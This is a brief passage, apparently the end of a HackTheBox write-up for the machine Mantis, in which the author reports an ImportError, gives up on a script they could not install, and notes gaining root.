ImportError: No module named packets

I couldn’t install this module using pip2 or pip so this script was a dead end as I couldn’t get it to work for me

That was root on the machine Mantis from hackthebox!